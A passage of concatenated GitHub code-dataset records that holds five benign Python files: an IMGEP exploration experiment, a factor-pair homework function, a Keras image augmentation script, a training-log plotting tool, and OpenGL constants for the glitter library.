s_space, n_checkpoints=1):\n data = np.array([self.data[i][-1,self.s_spaces[s_space]] for i in range(len(self.data))])\n mins = np.array([-1.5]*len(self.s_spaces[s_space]))\n maxs = np.array([1.5]*len(self.s_spaces[s_space]))\n checkpoints = [int(x) for x in np.linspace(len(data)/n_checkpoints, len(data), n_checkpoints)]\n n = len(mins)\n assert len(data[0]) == n\n gs = [0, 10, 100, 20, 10, 10, 10, 5, 5, 3][n]\n epss = (maxs - mins) / gs\n grid = np.zeros([gs] * n)\n #print np.size(grid), mins, maxs\n res = [0]\n for c in range(1, len(checkpoints)):\n for i in range(checkpoints[c-1], checkpoints[c]):\n idxs = np.array((data[i] - mins) / epss, dtype=int)\n #print c, i, idxs\n idxs[idxs>=gs] = gs-1\n idxs[idxs<0] = 0\n #print idxs\n grid[tuple(idxs)] = grid[tuple(idxs)] + 1\n grid[grid > 1] = 1\n res.append(np.sum(grid))\n return np.array(res) / gs ** n\n\n\n\n \n def run(self, iterations=100000, profile=False, print_logs=False):\n \n if profile:\n cp = cProfile.Profile()\n cp.enable()\n \n t = time.clock()\n while self.i < iterations:\n if print_logs:\n # Print number of iterations up to now:\n if self.i - self.last_print > 1000:\n self.last_print = 1000 * (self.i // 1000)\n print(\"\\nIteration:\", self.i)\n print(\"Time:\", int(10.*(time.clock() - t)) / 10.)\n print(\"Average steps\", int(10.*self.avg_steps) / 10.)\n print(\"n_stick1_moved\", self.environment.n_stick1_moved - self.n_stick1_moved)\n print(\"n_stick2_moved\", self.environment.n_stick2_moved - self.n_stick2_moved)\n print(\"n_obj1_moved\", self.environment.n_obj1_moved - self.n_obj1_moved)\n print(\"n_obj2_moved\", self.environment.n_obj2_moved - self.n_obj2_moved)\n self.n_stick1_moved = self.environment.n_stick1_moved\n self.n_stick2_moved = self.environment.n_stick2_moved\n self.n_obj1_moved = self.environment.n_obj1_moved\n self.n_obj2_moved = self.environment.n_obj2_moved\n \n if self.condition == \"AMB\":\n for mid in [\"mod1\", \"mod2\", \"mod3\", \"mod4\", \"mod7\", \"mod10\"]:\n if mid in self.learning_modules:\n print(\"Interest of module\", mid, \":\", int(1000.*self.learning_modules[mid].interest_model.current_interest) / 1000.)\n \n t = time.clock()\n \n # Choose the babbling module (probabilities proportional to interests, with epsilon of random choice):\n if self.condition == \"RMB\":\n # Get the interest of modules\n interests = [self.learning_modules[mid].interest() for mid in self.learning_modules.keys()]\n 
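# Interests are logged under RMB too, but the module choice below is uniform-random; only the AMB branch\n                # samples modules in proportion to interest (prop_choice with eps=0.2 of fully random choice).\n                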
self.interests_evolution.append(interests)\n babbling_module = np.random.choice(list(self.learning_modules.values()))\n elif self.condition == \"AMB\":\n # Get the interest of modules\n interests = [self.learning_modules[mid].interest() for mid in self.learning_modules.keys()]\n self.interests_evolution.append(interests)\n babbling_module = list(self.learning_modules.values())[prop_choice(interests, eps=0.2)]\n #babbling_module = self.learning_modules[\"mod1\"]\n elif self.condition == \"FRGB\" or self.condition == \"rmb\":\n babbling_module = self.learning_modules[\"mod1\"] \n elif self.condition == \"SGS\":\n babbling_module = self.learning_modules[\"mod4\"] \n elif self.condition == \"FC\":\n fc = [\"mod1\", \"mod2\", \"mod4\", \"mod3\", \"mod7\"]\n m = self.i // (iterations // len(fc))\n babbling_module = self.learning_modules[fc[m]]\n else:\n raise NotImplementedError\n \n # The babbling module picks a random goal in its sensory space and returns 4 noisy motor commands:\n if babbling_module.t < babbling_module.motor_babbling_n_iter or np.random.random() < self.rmb_prop or self.condition == \"rmb\":\n m = babbling_module.motor_babbling(steps=1)\n ms_array, steps = self.execute_perceive(m)\n self.chosen_modules.append(\"random\")\n else:\n self.chosen_modules.append(babbling_module.mid)\n sg = babbling_module.interest_model.sample()\n babbling_module.sg = sg\n for _ in range(self.n_explore):\n m = babbling_module.inverse(sg)\n ms_array, steps = self.execute_perceive(m)\n self.avg_steps = self.avg_steps * 0.99 + 0.01 * steps\n \n # Update Interest\n if self.condition == \"AMB\":\n m = babbling_module.inverse(sg, explore=False)\n ms_array, steps = self.execute_perceive(m)\n babbling_module.update_im(m, np.concatenate(ms_array[:,babbling_module.s_space]))\n \n \n \n \n if profile:\n cp.disable()\n cp.dump_stats(\"test.cprof\")\n \n if print_logs:\n print(\"n stick1_moved\", self.environment.n_stick1_moved)\n print(\"n stick2_moved\", self.environment.n_stick2_moved)\n print(\"n obj1_moved\", self.environment.n_obj1_moved)\n print(\"n obj2_moved\", self.environment.n_obj2_moved)\n \n print()\n print(\"Parameters:\", iterations, self.explo_noise, self.optim_explo, self.condition, self.distractors)\n \n\n\n def plot_interests(self):\n \n interests_evolution = np.array(self.interests_evolution)\n plt.plot(interests_evolution[:,0], label=\"hand\")\n plt.plot(interests_evolution[:,1], label=\"stick1\")\n plt.plot(interests_evolution[:,2], label=\"stick2\")\n plt.plot(interests_evolution[:,3], label=\"toy1\")\n plt.plot(interests_evolution[:,6], label=\"toy2\")\n plt.plot(interests_evolution[:,-1], label=\"static\")\n plt.plot(interests_evolution[:,9], label=\"cat\")\n \n plt.legend()\n \n def compute_explo(self):\n self.explo = {}\n for s_space in [\"s_hand\", \"s_tool1\", \"s_tool2\", \"s_obj1\", \"s_obj4\"]:\n self.explo[s_space] = self.compute_explo_space(s_space, 10)\n \n def plot_explo(self):\n for s_space in [\"s_hand\", \"s_tool1\", \"s_tool2\", \"s_obj1\", \"s_obj4\"]:\n plt.plot(self.explo[s_space], label=s_space)\n plt.legend()\n \n def dump(self, filename):\n to_store = dict(\n data=self.data,\n steps=self.steps,\n interests_evolution=self.interests_evolution,\n explo=self.explo,\n chosen_modules=self.chosen_modules\n )\n for key in to_store.keys():\n with open(filename + \"-\" + key + \".pickle\", 'wb') as f:\n pickle.dump(to_store[key], f)\n# \n# def load(self, filename):\n# with open(filename, 'r') as f:\n# logs = cPickle.load(f)\n# f.close()\n# self.data = logs[\"data\"]\n# 
self.interests_evolution = logs[\"interests_evolution\"]\n# \n# ","repo_name":"sebastien-forestier/IMGEP","sub_path":"2DSimulation/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":16580,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"}
{"seq_id":"16844025399","text":"def get_factors(num):\n    modList = []\n    pairList = []\n    for i in range(1, num + 1):\n        if num % i == 0:\n            modList.append(i)\n    while modList:\n        if len(modList) == 1:\n            tup = (modList[0], modList.pop())\n        else:\n            tup = (modList.pop(0), modList.pop())\n        pairList.append(tup)\n\n    return pairList\n\n\nprint(get_factors(12))\nprint(get_factors(16))\n","repo_name":"jimturbo24/TIY-Homework","sub_path":"week_6/ex_1.py","file_name":"ex_1.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"69800912805","text":"# Save data-augmented images\n\nfrom PIL import Image\nimport os\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport numpy as np\n\n# path to the directory of original images\noriginal_image_dir = './dataset/train/'\n\n# directory where the augmented images will be saved\naugmented_image_dir = './dataset/datagen/'\n\nread_folder = os.listdir(original_image_dir)\n\n# number of augmentations to generate per image\nnum_augmented_images = 10\n\n# ImageDataGenerator configuration\ndatagen = ImageDataGenerator(\n    rescale=1.0/255.,\n    rotation_range=2,  # rotation angle range\n    width_shift_range=0.07,  # horizontal shift range\n    height_shift_range=0.07,  # vertical shift range\n    shear_range=0.07,  # shear intensity range\n    zoom_range=0.07,  # zoom in/out range\n    #horizontal_flip=True,  # whether to flip horizontally\n    fill_mode='nearest'  # how newly created pixels are filled\n)\n\nfor test in read_folder:\n    original_image_path = os.path.join(original_image_dir, test)\n    \n    # list of original image files\n    original_image_files = os.listdir(original_image_path)\n    \n    # loop that performs the augmentation and saves the results\n    for original_image_file in original_image_files:\n        \n        # load the original image\n        original_img_file = os.path.join(original_image_path, original_image_file)\n        #print(original_img_file)\n        original_image = Image.open(original_img_file)\n        original_image = np.array(original_image)\n\n        # run the augmentation and generate the images\n        augmented_images = []\n        for i in range(num_augmented_images):\n            augmented_image = datagen.random_transform(original_image)\n            augmented_images.append(augmented_image)\n\n        # save the generated images\n        base_filename, _ = os.path.splitext(original_image_file)\n        for i, augmented_image in enumerate(augmented_images):\n            augmented_image_path = os.path.join(augmented_image_dir, test)\n            if not os.path.exists(augmented_image_path):\n                os.makedirs(augmented_image_path)\n                print(augmented_image_path)\n            saved_image = os.path.join(augmented_image_path, f'{base_filename}_aug_{i}.jpg')\n            augmented_image = Image.fromarray(augmented_image)\n            augmented_image.save(saved_image)\n\n    print(f'Saved {num_augmented_images} augmented images for each of {len(original_image_files)} original images.')\n","repo_name":"sou05091/MainProject_LicensePlate","sub_path":"Number Plate Classification/Data Preprocessing Folder/ImageDataGenerator.py","file_name":"ImageDataGenerator.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"5423356018","text":"import os\nimport sys\nimport logging\nimport re\n\nimport ujson as json\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ndef parse(filename, elapsed_unit=60*60):\n    value_list = []\n    with open(filename, 'r') as f:\n        accumulated_time = 0\n        for line in f:\n            if 'INFO' 
not in line or 'epoch' not in line:\n continue\n if 'rank' in line and 'rank:00' not in line:\n continue\n line = re.sub(r'\\([^)]*\\)|\\[[^)]*\\]|{|}', r'', line)\n items = [item.split(':') for item in line.split(' ') if item.strip()]\n\n values = {}\n for item in items:\n key = item[0]\n value = item[-1].replace(',', '').replace('sec', '')\n if '/' in value:\n value = float(value.split('/')[0]) / float(value.split('/')[1])\n values[key] = float(value)\n values['elapsed'] = values['elapsed'] / elapsed_unit\n accumulated_time += values['elapsed']\n values['accumulated'] = accumulated_time\n value_list.append(values)\n return value_list\n\ndef sample(data, num_samples=100):\n step = len(data) // num_samples\n return data[::step]\n\ndef average(data, targets, steps=100):\n samples = []\n for i in range(len(data)//steps):\n sample = data[i*steps:i*steps+steps]\n\n result = {'step':sample[0]['step'], 'epoch':sample[0]['epoch'], 'accumulated':sample[0]['accumulated']}\n for t in targets:\n result[t] = np.average([d[t] for d in sample])\n samples.append(result)\n return samples\n\ndef main(args):\n matplotlib.rc('font', family=\"AppleGothic\")\n\n logging.info(args)\n datas = [parse(filename) for filename in args.files]\n targets = ['loss', 'learning-rate', 'accuracy', 'top5']\n\n for xaxis in ['epoch', 'elapsed']:\n fig = plt.figure(figsize=(12, 8))\n for i, target in enumerate(targets):\n ax = fig.add_subplot(2, 2, i+1)\n ax.set_xlabel(xaxis.replace('elapsed', 'elapsed (hours)'), fontsize=12)\n ax.set_ylabel(target, fontsize=12)\n\n for filename, data in zip(args.files, datas):\n filename = filename.split('/')[-1]\n data = sample(data, args.samples) if args.sample else average(data, targets, args.samples)\n if xaxis == 'epoch':\n ax.plot([d['step']+d['epoch'] for d in data], [d[target] for d in data], label=filename)\n if xaxis == 'elapsed':\n ax.plot([d['accumulated'] for d in data], [d[target] for d in data], label=filename)\n if target in ['accuracy', 'top5']:\n ax.set_ylim(0.0, 1.0)\n ax.legend()\n fig.tight_layout()\n fig.savefig(args.output + '-'+xaxis+'.png')\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('files', type=str, nargs='+')\n parser.add_argument('-o', '--output', type=str, default='result')\n parser.add_argument('-n', '--samples', type=int, default=100)\n parser.add_argument('--sample', action='store_true')\n parser.add_argument('--log-filename', type=str, default='')\n args = parser.parse_args()\n\n if not args.log_filename:\n logging.basicConfig(level=logging.INFO, format='[%(asctime)s %(levelname)s] %(message)s', stream=sys.stderr)\n else:\n logging.basicConfig(level=logging.INFO, format='[%(asctime)s %(levelname)s] %(message)s', filename=args.log_filename)\n\n main(args)\n\n","repo_name":"wbaek/distributed-tf","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37414910096","text":"\"\"\"Constants and enums.\n\n@todo: Add stencil components to L{texture_formats}.\n\n@author: Stephan Wenger\n@date: 2012-02-29\n\"\"\"\n\nimport glitter.raw as _gl\nfrom glitter.utils.dtypes import uint8, uint16, uint32, int8, int16, int32, float32\nfrom glitter.utils.enum import Enum\n\nformat_to_length = {\n #_gl.GL_COLOR_INDEX: 1,\n _gl.GL_STENCIL_INDEX: 1,\n _gl.GL_DEPTH_COMPONENT: 1,\n _gl.GL_RED: 1,\n _gl.GL_GREEN: 1,\n _gl.GL_BLUE: 1,\n _gl.GL_ALPHA: 1,\n _gl.GL_RGB: 
3,\n _gl.GL_BGR: 3,\n _gl.GL_RGBA: 4,\n _gl.GL_BGRA: 4,\n #_gl.GL_LUMINANCE: 1,\n #_gl.GL_LUMINANCE_ALPHA: 2,\n }\n\ntexture_formats = [ # WARNING: In case of ambiguities, the LAST ONE will win.\n ((float32, 1), _gl.GL_DEPTH_COMPONENT32F, (_gl.GL_FLOAT, _gl.GL_DEPTH_COMPONENT)),\n ((int16, 1), _gl.GL_DEPTH_COMPONENT16, (_gl.GL_SHORT, _gl.GL_DEPTH_COMPONENT)),\n ((int32, 1), _gl.GL_DEPTH_COMPONENT24, (_gl.GL_INT, _gl.GL_DEPTH_COMPONENT)),\n ((int32, 1), _gl.GL_DEPTH_COMPONENT32, (_gl.GL_INT, _gl.GL_DEPTH_COMPONENT)),\n\n ((uint8, 1), _gl.GL_R8UI, (_gl.GL_UNSIGNED_BYTE, _gl.GL_RED_INTEGER )),\n ((int8, 1), _gl.GL_R8I, (_gl.GL_BYTE, _gl.GL_RED_INTEGER )),\n ((uint16, 1), _gl.GL_R16UI, (_gl.GL_UNSIGNED_SHORT, _gl.GL_RED_INTEGER )),\n ((int16, 1), _gl.GL_R16I, (_gl.GL_SHORT, _gl.GL_RED_INTEGER )),\n ((uint32, 1), _gl.GL_R32UI, (_gl.GL_UNSIGNED_INT, _gl.GL_RED_INTEGER )),\n ((int32, 1), _gl.GL_R32I, (_gl.GL_INT, _gl.GL_RED_INTEGER )),\n ((float32, 1), _gl.GL_R32F, (_gl.GL_FLOAT, _gl.GL_RED )),\n ((uint8, 2), _gl.GL_RG8UI, (_gl.GL_UNSIGNED_BYTE, _gl.GL_RG_INTEGER )),\n ((int8, 2), _gl.GL_RG8I, (_gl.GL_BYTE, _gl.GL_RG_INTEGER )),\n ((uint16, 2), _gl.GL_RG16UI, (_gl.GL_UNSIGNED_SHORT, _gl.GL_RG_INTEGER )),\n ((int16, 2), _gl.GL_RG16I, (_gl.GL_SHORT, _gl.GL_RG_INTEGER )),\n ((uint32, 2), _gl.GL_RG32UI, (_gl.GL_UNSIGNED_INT, _gl.GL_RG_INTEGER )),\n ((int32, 2), _gl.GL_RG32I, (_gl.GL_INT, _gl.GL_RG_INTEGER )),\n ((float32, 2), _gl.GL_RG32F, (_gl.GL_FLOAT, _gl.GL_RG )),\n ((uint8, 3), _gl.GL_RGB8UI, (_gl.GL_UNSIGNED_BYTE, _gl.GL_RGB_INTEGER )),\n ((int8, 3), _gl.GL_RGB8I, (_gl.GL_BYTE, _gl.GL_RGB_INTEGER )),\n ((uint16, 3), _gl.GL_RGB16UI, (_gl.GL_UNSIGNED_SHORT, _gl.GL_RGB_INTEGER )),\n ((int16, 3), _gl.GL_RGB16I, (_gl.GL_SHORT, _gl.GL_RGB_INTEGER )),\n ((uint32, 3), _gl.GL_RGB32UI, (_gl.GL_UNSIGNED_INT, _gl.GL_RGB_INTEGER )),\n ((int32, 3), _gl.GL_RGB32I, (_gl.GL_INT, _gl.GL_RGB_INTEGER )),\n ((float32, 3), _gl.GL_RGB32F, (_gl.GL_FLOAT, _gl.GL_RGB )),\n ((uint8, 4), _gl.GL_RGBA8UI, (_gl.GL_UNSIGNED_BYTE, _gl.GL_RGBA_INTEGER)),\n ((int8, 4), _gl.GL_RGBA8I, (_gl.GL_BYTE, _gl.GL_RGBA_INTEGER)),\n ((uint16, 4), _gl.GL_RGBA16UI, (_gl.GL_UNSIGNED_SHORT, _gl.GL_RGBA_INTEGER)),\n ((int16, 4), _gl.GL_RGBA16I, (_gl.GL_SHORT, _gl.GL_RGBA_INTEGER)),\n ((uint32, 4), _gl.GL_RGBA32UI, (_gl.GL_UNSIGNED_INT, _gl.GL_RGBA_INTEGER)),\n ((int32, 4), _gl.GL_RGBA32I, (_gl.GL_INT, _gl.GL_RGBA_INTEGER)),\n ((float32, 4), _gl.GL_RGBA32F, (_gl.GL_FLOAT, _gl.GL_RGBA )),\n ]\n\"\"\"Mapping between C{numpy} types and OpenGL types.\n\nFirst column: C{numpy} datatype, number of color channels\nSecond column: OpenGL internal format\nThird column: OpenGL type, OpenGL format\n\"\"\"\n\ndtype_to_gl_iformat = dict((x[0], x[1] ) for x in texture_formats)\ngl_iformat_to_dtype = dict((x[1], x[0] ) for x in texture_formats)\ndtype_to_gl_format = dict((x[0], x[2][1]) for x in texture_formats)\ngl_format_to_dtype = dict((x[2][1], x[0] ) for x in texture_formats)\ngl_iformat_to_gl_type = dict((x[1], x[2][0]) for x in texture_formats)\n\ntexture_compare_funcs = Enum(\n LEQUAL=_gl.GL_LEQUAL,\n GEQUAL=_gl.GL_GEQUAL,\n LESS=_gl.GL_LESS,\n GREATER=_gl.GL_GREATER,\n EQUAL=_gl.GL_EQUAL,\n NOTEQUAL=_gl.GL_NOTEQUAL,\n ALWAYS=_gl.GL_ALWAYS,\n NEVER=_gl.GL_NEVER,\n )\n\ntexture_compare_modes = Enum(\n COMPARE_REF_TO_TEXTURE=_gl.GL_COMPARE_REF_TO_TEXTURE,\n NONE=_gl.GL_NONE,\n )\n\ntexture_min_filters = Enum(\n NEAREST=_gl.GL_NEAREST,\n LINEAR=_gl.GL_LINEAR,\n NEAREST_MIPMAP_NEAREST=_gl.GL_NEAREST_MIPMAP_NEAREST,\n 
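# the word before MIPMAP filters texels within a mip level; the word after it blends between the two nearest levels\n    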
LINEAR_MIPMAP_NEAREST=_gl.GL_LINEAR_MIPMAP_NEAREST,\n NEAREST_MIPMAP_LINEAR=_gl.GL_NEAREST_MIPMAP_LINEAR,\n LINEAR_MIPMAP_LINEAR=_gl.GL_LINEAR_MIPMAP_LINEAR,\n )\n\ntexture_mag_filters = Enum(\n NEAREST=_gl.GL_NEAREST,\n LINEAR=_gl.GL_LINEAR,\n )\n\ntexture_swizzles = Enum(\n RED=_gl.GL_RED,\n GREEN=_gl.GL_GREEN,\n BLUE=_gl.GL_BLUE,\n ALPHA=_gl.GL_ALPHA,\n ZERO=_gl.GL_ZERO,\n ONE=_gl.GL_ONE,\n )\n\ntexture_wrapmodes = Enum(\n CLAMP_TO_EDGE=_gl.GL_CLAMP_TO_EDGE,\n CLAMP_TO_BORDER=_gl.GL_CLAMP_TO_BORDER,\n MIRRORED_REPEAT=_gl.GL_MIRRORED_REPEAT,\n REPEAT=_gl.GL_REPEAT,\n )\n\nprimitive_types = Enum(\n POINTS=_gl.GL_POINTS,\n LINE_STRIP=_gl.GL_LINE_STRIP,\n LINE_LOOP=_gl.GL_LINE_LOOP,\n LINES=_gl.GL_LINES,\n LINE_STRIP_ADJACENCY=_gl.GL_LINE_STRIP_ADJACENCY,\n LINES_ADJACENCY=_gl.GL_LINES_ADJACENCY,\n TRIANGLE_STRIP=_gl.GL_TRIANGLE_STRIP,\n TRIANGLE_FAN=_gl.GL_TRIANGLE_FAN,\n TRIANGLES=_gl.GL_TRIANGLES,\n TRIANGLE_STRIP_ADJACENCY=_gl.GL_TRIANGLE_STRIP_ADJACENCY,\n TRIANGLES_ADJACENCY=_gl.GL_TRIANGLES_ADJACENCY,\n PATCHES=_gl.GL_PATCHES,\n )\n\nbuffer_usages = Enum(\n STREAM_DRAW=_gl.GL_STREAM_DRAW,\n STREAM_READ=_gl.GL_STREAM_READ,\n STREAM_COPY=_gl.GL_STREAM_COPY,\n STATIC_DRAW=_gl.GL_STATIC_DRAW,\n STATIC_READ=_gl.GL_STATIC_READ,\n STATIC_COPY=_gl.GL_STATIC_COPY,\n DYNAMIC_DRAW=_gl.GL_DYNAMIC_DRAW,\n DYNAMIC_READ=_gl.GL_DYNAMIC_READ,\n DYNAMIC_COPY=_gl.GL_DYNAMIC_COPY,\n )\n\nbuffer_dimensions_to_primitive = {1: primitive_types.POINTS, 2: primitive_types.LINES, 3: primitive_types.TRIANGLES}\nprimitive_to_buffer_dimensions = {primitive_types.POINTS: 1, primitive_types.LINES: 2, primitive_types.TRIANGLES: 3}\n\nblend_functions = Enum(\n ZERO=_gl.GL_ZERO,\n ONE=_gl.GL_ONE,\n SRC_COLOR=_gl.GL_SRC_COLOR,\n ONE_MINUS_SRC_COLOR=_gl.GL_ONE_MINUS_SRC_COLOR,\n DST_COLOR=_gl.GL_DST_COLOR,\n ONE_MINUS_DST_COLOR=_gl.GL_ONE_MINUS_DST_COLOR,\n SRC_ALPHA=_gl.GL_SRC_ALPHA,\n ONE_MINUS_SRC_ALPHA=_gl.GL_ONE_MINUS_SRC_ALPHA,\n DST_ALPHA=_gl.GL_DST_ALPHA,\n ONE_MINUS_DST_ALPHA=_gl.GL_ONE_MINUS_DST_ALPHA,\n CONSTANT_COLOR=_gl.GL_CONSTANT_COLOR,\n ONE_MINUS_CONSTANT_COLOR=_gl.GL_ONE_MINUS_CONSTANT_COLOR,\n CONSTANT_ALPHA=_gl.GL_CONSTANT_ALPHA,\n ONE_MINUS_CONSTANT_ALPHA=_gl.GL_ONE_MINUS_CONSTANT_ALPHA,\n SRC_ALPHA_SATURATE=_gl.GL_SRC_ALPHA_SATURATE,\n)\n\nblend_equations = Enum(\n ADD=_gl.GL_FUNC_ADD,\n SUBTRACT=_gl.GL_FUNC_SUBTRACT,\n REVERSE_SUBTRACT=_gl.GL_FUNC_REVERSE_SUBTRACT,\n MIN=_gl.GL_MIN,\n MAX=_gl.GL_MAX,\n)\n\ndepth_functions = Enum(\n NEVER=_gl.GL_NEVER,\n LESS=_gl.GL_LESS,\n EQUAL=_gl.GL_EQUAL,\n LEQUAL=_gl.GL_LEQUAL,\n GREATER=_gl.GL_GREATER,\n NOTEQUAL=_gl.GL_NOTEQUAL,\n GEQUAL=_gl.GL_GEQUAL,\n ALWAYS=_gl.GL_ALWAYS,\n)\n\ndraw_buffers = Enum(\n NONE=_gl.GL_NONE,\n FRONT_LEFT=_gl.GL_FRONT_LEFT,\n FRONT_RIGHT=_gl.GL_FRONT_RIGHT,\n BACK_LEFT=_gl.GL_BACK_LEFT,\n BACK_RIGHT=_gl.GL_BACK_RIGHT,\n FRONT=_gl.GL_FRONT,\n BACK=_gl.GL_BACK,\n LEFT=_gl.GL_LEFT,\n RIGHT=_gl.GL_RIGHT,\n FRONT_AND_BACK=_gl.GL_FRONT_AND_BACK,\n)\nfor key, value in list(_gl.__dict__.items()):\n if key.startswith(\"GL_COLOR_ATTACHMENT\"):\n draw_buffers._add(key[3:], value)\n\nhints = Enum(\n FASTEST=_gl.GL_FASTEST,\n NICEST=_gl.GL_NICEST,\n DONT_CARE=_gl.GL_DONT_CARE,\n)\n\nprovoking_vertices = Enum(\n PROVOKING=_gl.GL_PROVOKING_VERTEX,\n FIRST=_gl.GL_FIRST_VERTEX_CONVENTION,\n LAST=_gl.GL_LAST_VERTEX_CONVENTION,\n UNDEFINED=_gl.GL_UNDEFINED_VERTEX,\n)\n\nlogic_op_modes = Enum(\n CLEAR=_gl.GL_CLEAR,\n SET=_gl.GL_SET,\n COPY=_gl.GL_COPY,\n COPY_INVERTED=_gl.GL_COPY_INVERTED,\n NOOP=_gl.GL_NOOP,\n INVERT=_gl.GL_INVERT,\n 
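# the remaining ops combine source (s) and destination (d) bitwise, e.g. AND_REVERSE = s & ~d\n    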
AND=_gl.GL_AND,\n NAND=_gl.GL_NAND,\n OR=_gl.GL_OR,\n NOR=_gl.GL_NOR,\n XOR=_gl.GL_XOR,\n EQUIV=_gl.GL_EQUIV,\n AND_REVERSE=_gl.GL_AND_REVERSE,\n AND_INVERTED=_gl.GL_AND_INVERTED,\n OR_REVERSE=_gl.GL_OR_REVERSE,\n OR_INVERTED=_gl.GL_OR_INVERTED,\n)\n\nprovoke_modes = Enum(\n FIRST_VERTEX_CONVENTION=_gl.GL_FIRST_VERTEX_CONVENTION,\n LAST_VERTEX_CONVENTION=_gl.GL_LAST_VERTEX_CONVENTION,\n)\n\ncolor_read_formats = Enum(\n STENCIL_INDEX=_gl.GL_STENCIL_INDEX,\n DEPTH_COMPONENT=_gl.GL_DEPTH_COMPONENT,\n DEPTH_STENCIL=_gl.GL_DEPTH_STENCIL,\n RED=_gl.GL_RED,\n GREEN=_gl.GL_GREEN,\n BLUE=_gl.GL_BLUE,\n RGB=_gl.GL_RGB,\n BGR=_gl.GL_BGR,\n RGBA=_gl.GL_RGBA,\n BGRA=_gl.GL_BGRA,\n)\n\ncolor_read_types = Enum(\n UNSIGNED_BYTE=_gl.GL_UNSIGNED_BYTE,\n BYTE=_gl.GL_BYTE,\n UNSIGNED_SHORT=_gl.GL_UNSIGNED_SHORT,\n SHORT=_gl.GL_SHORT,\n UNSIGNED_INT=_gl.GL_UNSIGNED_INT,\n INT=_gl.GL_INT,\n HALF_FLOAT=_gl.GL_HALF_FLOAT,\n FLOAT=_gl.GL_FLOAT,\n UNSIGNED_BYTE_3_3_2=_gl.GL_UNSIGNED_BYTE_3_3_2,\n UNSIGNED_BYTE_2_3_3_REV=_gl.GL_UNSIGNED_BYTE_2_3_3_REV,\n UNSIGNED_SHORT_5_6_5=_gl.GL_UNSIGNED_SHORT_5_6_5,\n UNSIGNED_SHORT_5_6_5_REV=_gl.GL_UNSIGNED_SHORT_5_6_5_REV,\n UNSIGNED_SHORT_4_4_4_4=_gl.GL_UNSIGNED_SHORT_4_4_4_4,\n UNSIGNED_SHORT_4_4_4_4_REV=_gl.GL_UNSIGNED_SHORT_4_4_4_4_REV,\n UNSIGNED_SHORT_5_5_5_1=_gl.GL_UNSIGNED_SHORT_5_5_5_1,\n UNSIGNED_SHORT_1_5_5_5_REV=_gl.GL_UNSIGNED_SHORT_1_5_5_5_REV,\n UNSIGNED_INT_8_8_8_8=_gl.GL_UNSIGNED_INT_8_8_8_8,\n UNSIGNED_INT_8_8_8_8_REV=_gl.GL_UNSIGNED_INT_8_8_8_8_REV,\n UNSIGNED_INT_10_10_10_2=_gl.GL_UNSIGNED_INT_10_10_10_2,\n UNSIGNED_INT_2_10_10_10_REV=_gl.GL_UNSIGNED_INT_2_10_10_10_REV,\n UNSIGNED_INT_24_8=_gl.GL_UNSIGNED_INT_24_8,\n UNSIGNED_INT_10F_11F_11F_REV=_gl.GL_UNSIGNED_INT_10F_11F_11F_REV,\n UNSIGNED_INT_5_9_9_9_REV=_gl.GL_UNSIGNED_INT_5_9_9_9_REV,\n FLOAT_32_UNSIGNED_INT_24_8_REV=_gl.GL_FLOAT_32_UNSIGNED_INT_24_8_REV,\n)\n\nread_buffers = Enum(\n NONE=_gl.GL_NONE,\n FRONT_LEFT=_gl.GL_FRONT_LEFT,\n FRONT_RIGHT=_gl.GL_FRONT_RIGHT,\n BACK_LEFT=_gl.GL_BACK_LEFT,\n BACK_RIGHT=_gl.GL_BACK_RIGHT,\n FRONT=_gl.GL_FRONT,\n BACK=_gl.GL_BACK,\n LEFT=_gl.GL_LEFT,\n RIGHT=_gl.GL_RIGHT,\n)\nfor key, value in list(_gl.__dict__.items()):\n if key.startswith(\"GL_COLOR_ATTACHMENT\"):\n read_buffers._add(key[3:], value)\n\ntransform_feedback_buffer_modes = Enum(\n SEPARATE_ATTRIBS=_gl.GL_SEPARATE_ATTRIBS,\n INTERLEAVED_ATTRIBS=_gl.GL_INTERLEAVED_ATTRIBS,\n)\n\nclient_wait_sync_returns = Enum(\n ALREADY_SIGNALED=_gl.GL_ALREADY_SIGNALED,\n TIMEOUT_EXPIRED=_gl.GL_TIMEOUT_EXPIRED,\n CONDITION_SATISFIED=_gl.GL_CONDITION_SATISFIED,\n WAIT_FAILED=_gl.GL_WAIT_FAILED,\n)\n\nframebuffer_status = Enum(\n COMPLETE=_gl.GL_FRAMEBUFFER_COMPLETE,\n UNDEFINED=_gl.GL_FRAMEBUFFER_UNDEFINED,\n UNSUPPORTED=_gl.GL_FRAMEBUFFER_UNSUPPORTED,\n INCOMPLETE_ATTACHMENT=_gl.GL_FRAMEBUFFER_INCOMPLETE_ATTACHMENT,\n INCOMPLETE_MISSING_ATTACHMENT=_gl.GL_FRAMEBUFFER_INCOMPLETE_MISSING_ATTACHMENT,\n INCOMPLETE_DRAW_BUFFER=_gl.GL_FRAMEBUFFER_INCOMPLETE_DRAW_BUFFER,\n INCOMPLETE_READ_BUFFER=_gl.GL_FRAMEBUFFER_INCOMPLETE_READ_BUFFER,\n INCOMPLETE_MULTISAMPLE=_gl.GL_FRAMEBUFFER_INCOMPLETE_MULTISAMPLE,\n INCOMPLETE_LAYER_TARGETS=_gl.GL_FRAMEBUFFER_INCOMPLETE_LAYER_TARGETS,\n)\n\ncull_face_modes = Enum(\n FRONT=_gl.GL_FRONT,\n BACK=_gl.GL_BACK,\n FRONT_AND_BACK=_gl.GL_FRONT_AND_BACK,\n)\n\nfront_face_modes = Enum(\n CW=_gl.GL_CW,\n CCW=_gl.GL_CCW,\n)\n\npolygon_modes = Enum(\n POINT=_gl.GL_POINT,\n LINE=_gl.GL_LINE,\n FILL=_gl.GL_FILL,\n)\n\n__all__ = [\n \"format_to_length\",\n \"texture_formats\",\n 
